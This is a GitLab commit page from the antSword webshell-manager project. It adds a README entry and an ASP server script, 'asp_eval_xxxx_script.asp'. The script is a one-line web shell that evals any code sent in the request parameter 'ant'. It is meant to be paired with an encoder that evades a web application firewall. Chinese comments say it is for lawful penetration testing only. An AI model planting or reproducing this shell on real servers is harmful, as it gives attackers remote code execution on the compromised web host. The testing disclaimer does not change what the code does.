Skip to content
Projects
Groups
Snippets
Help
Loading...
Help
Submit feedback
Contribute to GitLab
Sign in / Register
Toggle navigation
A
antSword
Project
Project
Details
Activity
Releases
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
HuangJunbo
antSword
Commits
5222c4e0
Commit
5222c4e0
authored
Sep 19, 2016
by
Medicean
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
添加 ASP xxxxdog 编码器对应 shell 示例
parent
ef24b43f
Changes
2
Hide whitespace changes
Inline
Side-by-side
Showing
2 changed files
with
24 additions
and
0 deletions
+24
-0
README.md
shells/README.md
+4
-0
asp_eval_xxxx_script.asp
shells/asp_eval_xxxx_script.asp
+20
-0
No files found.
shells/README.md
View file @
5222c4e0
## Shell-Scripts
> 此目录用于存放一些示例的服务端脚本文件,仅供合法的渗透测试以及爱好者参考学习,请勿用于非法用途,否则将追究其相关责任!
### ASP
1.
[
Asp_Eval_xxxx_Script
](
./asp_eval_xxxx_script.asp
)
### ASP.Net
> .aspx .ashx
...
...
shells/asp_eval_xxxx_script.asp
0 → 100644
View file @
5222c4e0
<!--
/**
* _ ____ _
* __ _ _ __ | |_/ ___|_ _____ _ __ __| |
* / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
* | (_| | | | | |_ ___) \ V V / (_) | | | (_| |
* \__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
* ———————————————————————————————————————————————
* AntSword ASP eval xxxx Script
*
* 警告:
* 此脚本仅供合法的渗透测试以及爱好者参考学习
* 请勿用于非法用途,否则将追究其相关责任!
* ———————————————————————————————————————————————
*
* 密码: ant
*
* 此脚本需与 asp xxxxdog 编码器配套使用
-->
<%Function xxxx(str) eval str End Function%><%D = request("ant")%><%xxxx D%>
\ No newline at end of file
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment